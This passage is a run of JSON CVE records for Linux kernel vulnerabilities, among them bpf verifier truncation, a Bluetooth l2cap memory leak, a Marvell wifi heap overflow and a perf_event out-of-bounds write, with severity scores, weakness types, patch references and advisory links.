        "impact": {
          "cvss": {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-681: Incorrect Conversion between Numeric Types"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=9b00f1b78809",
              "refsource": "MISC",
              "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=9b00f1b78809"
            },
            {
              "name": "https://www.openwall.com/lists/oss-security/2021/03/23/2",
              "refsource": "MISC",
              "url": "https://www.openwall.com/lists/oss-security/2021/03/23/2"
            },
            {
              "name": "[oss-security] 20210323 [CVE-2021-3444] Linux kernel bpf verifier incorrect mod32 truncation",
              "refsource": "MLIST",
              "url": "http://www.openwall.com/lists/oss-security/2021/03/23/2"
            },
            {
              "name": "http://packetstormsecurity.com/files/162117/Kernel-Live-Patch-Security-Notice-LSN-0075-1.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/162117/Kernel-Live-Patch-Security-Notice-LSN-0075-1.html"
            },
            {
              "name": "https://security.netapp.com/advisory/ntap-20210416-0006/",
              "refsource": "CONFIRM",
              "url": "https://security.netapp.com/advisory/ntap-20210416-0006/"
            },
            {
              "name": "[debian-lts-announce] 20211015 [SECURITY] [DLA 2785-1] linux-4.19 security update",
              "refsource": "MLIST",
              "url": "https://lists.debian.org/debian-lts-announce/2021/10/msg00010.html"
            },
            {
              "name": "http://packetstormsecurity.com/files/164950/Kernel-Live-Patch-Security-Notice-LSN-0082-1.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/164950/Kernel-Live-Patch-Security-Notice-LSN-0082-1.html"
            }
          ]
        },
        "solution": [
          {
            "lang": "en",
            "value": "Apply or update to a kernel that contains the commit 9b00f1b78809 (\"bpf: Fix truncation handling for mod32 dst reg wrt zero\")."
          }
        ],
        "source": {
          "discovery": "EXTERNAL"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "cc1ad9ee-3454-478d-9317-d3e869d708bc",
    "assignerShortName": "canonical",
    "cveId": "CVE-2021-3444",
    "datePublished": "2021-03-23T17:45:13.714724Z",
    "dateReserved": "2021-03-16T00:00:00",
    "dateUpdated": "2024-09-16T17:27:58.788Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-3619
Vulnerability from cvelistv5
Published
2022-10-20 00:00
Modified
2024-08-03 01:14
Severity
Summary
Linux Kernel Bluetooth l2cap_core.c l2cap_recv_acldata memory leak
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T01:14:02.535Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bluetooth/bluetooth-next.git/commit/?id=97097c85c088e11651146da32a4e1cdb9dfa6193"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://vuldb.com/?id.211918"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability has been found in Linux Kernel and classified as problematic. This vulnerability affects the function l2cap_recv_acldata of the file net/bluetooth/l2cap_core.c of the component Bluetooth. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. VDB-211918 is the identifier assigned to this vulnerability."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "ADJACENT_NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 3.5,
            "baseSeverity": "LOW",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-404",
              "description": "CWE-404 Denial of Service -\u003e CWE-401 Memory Leak",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-10-20T00:00:00",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bluetooth/bluetooth-next.git/commit/?id=97097c85c088e11651146da32a4e1cdb9dfa6193"
        },
        {
          "url": "https://vuldb.com/?id.211918"
        }
      ],
      "title": "Linux Kernel Bluetooth l2cap_core.c l2cap_recv_acldata memory leak",
      "x_generator": "vuldb.com"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2022-3619",
    "datePublished": "2022-10-20T00:00:00",
    "dateReserved": "2022-10-20T00:00:00",
    "dateUpdated": "2024-08-03T01:14:02.535Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2014-3180
Vulnerability from cvelistv5
Published
2019-11-06 19:22
Modified
2024-08-06 10:35
Severity
Summary
In kernel/compat.c in the Linux kernel before 3.17, as used in Google Chrome OS and other products, there is a possible out-of-bounds read. restart_syscall uses uninitialized data when restarting compat_sys_nanosleep. NOTE: this is disputed because the code path is unreachable
Impacted products
VendorProduct
Linuxkernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T10:35:57.100Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://bugs.chromium.org/p/chromium/issues/detail?id=408827"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://lkml.org/lkml/2014/9/7/29"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "before 3.17"
            }
          ]
        }
      ],
      "datePublic": "2014-09-07T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "In kernel/compat.c in the Linux kernel before 3.17, as used in Google Chrome OS and other products, there is a possible out-of-bounds read. restart_syscall uses uninitialized data when restarting compat_sys_nanosleep. NOTE: this is disputed because the code path is unreachable"
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "out-of-bounds read",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2019-11-06T19:22:03",
        "orgId": "ebfee0ef-53dd-4cf3-9e2a-08a5bd7a7e28",
        "shortName": "Chrome"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://bugs.chromium.org/p/chromium/issues/detail?id=408827"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://lkml.org/lkml/2014/9/7/29"
        }
      ],
      "tags": [
        "disputed"
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security@google.com",
          "ID": "CVE-2014-3180",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "kernel",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "before 3.17"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Linux"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "** DISPUTED ** In kernel/compat.c in the Linux kernel before 3.17, as used in Google Chrome OS and other products, there is a possible out-of-bounds read. restart_syscall uses uninitialized data when restarting compat_sys_nanosleep. NOTE: this is disputed because the code path is unreachable."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "out-of-bounds read"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://bugs.chromium.org/p/chromium/issues/detail?id=408827",
              "refsource": "MISC",
              "url": "https://bugs.chromium.org/p/chromium/issues/detail?id=408827"
            },
            {
              "name": "https://lkml.org/lkml/2014/9/7/29",
              "refsource": "MISC",
              "url": "https://lkml.org/lkml/2014/9/7/29"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "ebfee0ef-53dd-4cf3-9e2a-08a5bd7a7e28",
    "assignerShortName": "Chrome",
    "cveId": "CVE-2014-3180",
    "datePublished": "2019-11-06T19:22:03",
    "dateReserved": "2014-05-03T00:00:00",
    "dateUpdated": "2024-08-06T10:35:57.100Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2019-14814
Vulnerability from cvelistv5
Published
2019-09-20 18:27
Modified
2024-08-05 00:26
Severity
Summary
There is heap-based buffer overflow in Linux kernel, all versions up to, excluding 5.3, in the marvell wifi chip driver in Linux kernel, that allows local users to cause a denial of service(system crash) or possibly execute arbitrary code.
References
URLTags
http://www.openwall.com/lists/oss-security/2019/08/28/1mailing-list, x_refsource_MLIST
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/T4JZ6AEUKFWBHQAROGMQARJ274PQP2QP/vendor-advisory, x_refsource_FEDORA
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/O3RUDQJXRJQVGHCGR4YZWTQ3ECBI7TXH/vendor-advisory, x_refsource_FEDORA
https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14814x_refsource_CONFIRM
https://www.openwall.com/lists/oss-security/2019/08/28/1x_refsource_MISC
https://github.com/torvalds/linux/commit/7caac62ed598a196d6ddf8d9c121e12e082cac3ax_refsource_MISC
https://access.redhat.com/security/cve/cve-2019-14814x_refsource_MISC
http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00064.htmlvendor-advisory, x_refsource_SUSE
http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00066.htmlvendor-advisory, x_refsource_SUSE
https://lists.debian.org/debian-lts-announce/2019/09/msg00025.htmlmailing-list, x_refsource_MLIST
https://usn.ubuntu.com/4157-1/vendor-advisory, x_refsource_UBUNTU
https://usn.ubuntu.com/4162-1/vendor-advisory, x_refsource_UBUNTU
https://usn.ubuntu.com/4157-2/vendor-advisory, x_refsource_UBUNTU
https://usn.ubuntu.com/4163-1/vendor-advisory, x_refsource_UBUNTU
https://usn.ubuntu.com/4163-2/vendor-advisory, x_refsource_UBUNTU
https://usn.ubuntu.com/4162-2/vendor-advisory, x_refsource_UBUNTU
http://packetstormsecurity.com/files/154951/Kernel-Live-Patch-Security-Notice-LSN-0058-1.htmlx_refsource_MISC
https://security.netapp.com/advisory/ntap-20191031-0005/x_refsource_CONFIRM
https://seclists.org/bugtraq/2019/Nov/11mailing-list, x_refsource_BUGTRAQ
http://packetstormsecurity.com/files/155212/Slackware-Security-Advisory-Slackware-14.2-kernel-Updates.htmlx_refsource_MISC
https://access.redhat.com/errata/RHSA-2020:0174vendor-advisory, x_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2020:0328vendor-advisory, x_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2020:0339vendor-advisory, x_refsource_REDHAT
https://lists.debian.org/debian-lts-announce/2020/03/msg00001.htmlmailing-list, x_refsource_MLIST
Impacted products
VendorProduct
Linuxkernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T00:26:39.067Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "[oss-security] 20190828 Linux kernel: three heap overflow in the marvell wifi driver",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2019/08/28/1"
          },
          {
            "name": "FEDORA-2019-4c91a2f76e",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/T4JZ6AEUKFWBHQAROGMQARJ274PQP2QP/"
          },
          {
            "name": "FEDORA-2019-97380355ae",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/O3RUDQJXRJQVGHCGR4YZWTQ3ECBI7TXH/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14814"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.openwall.com/lists/oss-security/2019/08/28/1"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/torvalds/linux/commit/7caac62ed598a196d6ddf8d9c121e12e082cac3a"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/security/cve/cve-2019-14814"
          },
          {
            "name": "openSUSE-SU-2019:2173",
            "tags": [
              "vendor-advisory",
              "x_refsource_SUSE",
              "x_transferred"
            ],
            "url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00064.html"
          },
          {
            "name": "openSUSE-SU-2019:2181",
            "tags": [
              "vendor-advisory",
              "x_refsource_SUSE",
              "x_transferred"
            ],
            "url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00066.html"
          },
          {
            "name": "[debian-lts-announce] 20190925 [SECURITY] [DLA 1930-1] linux security update",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2019/09/msg00025.html"
          },
          {
            "name": "USN-4157-1",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "https://usn.ubuntu.com/4157-1/"
          },
          {
            "name": "USN-4162-1",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "https://usn.ubuntu.com/4162-1/"
          },
          {
            "name": "USN-4157-2",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "https://usn.ubuntu.com/4157-2/"
          },
          {
            "name": "USN-4163-1",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "https://usn.ubuntu.com/4163-1/"
          },
          {
            "name": "USN-4163-2",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "https://usn.ubuntu.com/4163-2/"
          },
          {
            "name": "USN-4162-2",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "https://usn.ubuntu.com/4162-2/"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/154951/Kernel-Live-Patch-Security-Notice-LSN-0058-1.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20191031-0005/"
          },
          {
            "name": "20191108 [slackware-security] Slackware 14.2 kernel (SSA:2019-311-01)",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "https://seclists.org/bugtraq/2019/Nov/11"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/155212/Slackware-Security-Advisory-Slackware-14.2-kernel-Updates.html"
          },
          {
            "name": "RHSA-2020:0174",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2020:0174"
          },
          {
            "name": "RHSA-2020:0328",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2020:0328"
          },
          {
            "name": "RHSA-2020:0339",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2020:0339"
          },
          {
            "name": "[debian-lts-announce] 20200302 [SECURITY] [DLA 2114-1] linux-4.9 security update",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "all versions up to, excluding 5.3"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "There is heap-based buffer overflow in Linux kernel, all versions up to, excluding 5.3, in the marvell wifi chip driver in Linux kernel, that allows local users to cause a denial of service(system crash) or possibly execute arbitrary code."
        }
      ],
      "metrics": [
        {
          "cvssV3_0": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 5.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-122",
              "description": "CWE-122",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2020-03-02T19:06:06",
        "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
        "shortName": "redhat"
      },
      "references": [
        {
          "name": "[oss-security] 20190828 Linux kernel: three heap overflow in the marvell wifi driver",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2019/08/28/1"
        },
        {
          "name": "FEDORA-2019-4c91a2f76e",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/T4JZ6AEUKFWBHQAROGMQARJ274PQP2QP/"
        },
        {
          "name": "FEDORA-2019-97380355ae",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/O3RUDQJXRJQVGHCGR4YZWTQ3ECBI7TXH/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14814"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.openwall.com/lists/oss-security/2019/08/28/1"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/torvalds/linux/commit/7caac62ed598a196d6ddf8d9c121e12e082cac3a"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://access.redhat.com/security/cve/cve-2019-14814"
        },
        {
          "name": "openSUSE-SU-2019:2173",
          "tags": [
            "vendor-advisory",
            "x_refsource_SUSE"
          ],
          "url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00064.html"
        },
        {
          "name": "openSUSE-SU-2019:2181",
          "tags": [
            "vendor-advisory",
            "x_refsource_SUSE"
          ],
          "url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00066.html"
        },
        {
          "name": "[debian-lts-announce] 20190925 [SECURITY] [DLA 1930-1] linux security update",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2019/09/msg00025.html"
        },
        {
          "name": "USN-4157-1",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "https://usn.ubuntu.com/4157-1/"
        },
        {
          "name": "USN-4162-1",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "https://usn.ubuntu.com/4162-1/"
        },
        {
          "name": "USN-4157-2",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "https://usn.ubuntu.com/4157-2/"
        },
        {
          "name": "USN-4163-1",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "https://usn.ubuntu.com/4163-1/"
        },
        {
          "name": "USN-4163-2",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "https://usn.ubuntu.com/4163-2/"
        },
        {
          "name": "USN-4162-2",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "https://usn.ubuntu.com/4162-2/"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/154951/Kernel-Live-Patch-Security-Notice-LSN-0058-1.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://security.netapp.com/advisory/ntap-20191031-0005/"
        },
        {
          "name": "20191108 [slackware-security] Slackware 14.2 kernel (SSA:2019-311-01)",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "https://seclists.org/bugtraq/2019/Nov/11"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/155212/Slackware-Security-Advisory-Slackware-14.2-kernel-Updates.html"
        },
        {
          "name": "RHSA-2020:0174",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2020:0174"
        },
        {
          "name": "RHSA-2020:0328",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2020:0328"
        },
        {
          "name": "RHSA-2020:0339",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2020:0339"
        },
        {
          "name": "[debian-lts-announce] 20200302 [SECURITY] [DLA 2114-1] linux-4.9 security update",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00001.html"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
    "assignerShortName": "redhat",
    "cveId": "CVE-2019-14814",
    "datePublished": "2019-09-20T18:27:42",
    "dateReserved": "2019-08-10T00:00:00",
    "dateUpdated": "2024-08-05T00:26:39.067Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2023-6931
Vulnerability from cvelistv5
Published
2023-12-19 14:09
Modified
2024-08-02 08:42
Severity
Summary
Out-of-bounds write in Linux kernel's Performance Events system component
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T08:42:08.665Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "patch",
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=382c27f4ed28f803b1f1473ac2d8db0afc795a1b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://kernel.dance/382c27f4ed28f803b1f1473ac2d8db0afc795a1b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "packageName": "kernel",
          "product": "Kernel",
          "repo": "https://git.kernel.org",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "6.7",
              "status": "affected",
              "version": "4.3",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "user": "00000000-0000-4000-9000-000000000000",
          "value": "Budimir Markovic"
        }
      ],
      "datePublic": "2023-11-29T14:43:50+00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "A heap out-of-bounds write vulnerability in the Linux kernel\u0027s Performance Events system component can be exploited to achieve local privilege escalation.\n\nA perf_event\u0027s read_size can overflow, leading to an heap out-of-bounds increment or write in perf_read_group().\n\nWe recommend upgrading past commit 382c27f4ed28f803b1f1473ac2d8db0afc795a1b.\n\n"
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-233",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-233 Privilege Escalation"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-787",
              "description": "CWE-787 Out-of-bounds Write",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-12-19T14:09:14.085Z",
        "orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
        "shortName": "Google"
      },
      "references": [
        {
          "tags": [
            "patch"
          ],
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=382c27f4ed28f803b1f1473ac2d8db0afc795a1b"
        },
        {
          "url": "https://kernel.dance/382c27f4ed28f803b1f1473ac2d8db0afc795a1b"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "Out-of-bounds write in Linux kernel\u0027s Performance Events system component",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
    "assignerShortName": "Google",
    "cveId": "CVE-2023-6931",
    "datePublished": "2023-12-19T14:09:14.085Z",
    "dateReserved": "2023-12-18T20:13:06.510Z",
    "dateUpdated": "2024-08-02T08:42:08.665Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-3521
Vulnerability from cvelistv5
Published
2022-10-16 00:00
Modified
2024-08-03 01:14
Severity
Summary
Linux Kernel kcm kcmsock.c kcm_tx_work race condition
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T01:14:02.040Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=ec7eede369fe5b0d085ac51fdbb95184f87bfc6c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://vuldb.com/?id.211018"
          },
          {
            "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html"
          },
          {
            "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability has been found in Linux Kernel and classified as problematic. This vulnerability affects the function kcm_tx_work of the file net/kcm/kcmsock.c of the component kcm. The manipulation leads to race condition. It is recommended to apply a patch to fix this issue. VDB-211018 is the identifier assigned to this vulnerability."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "ADJACENT_NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 2.6,
            "baseSeverity": "LOW",
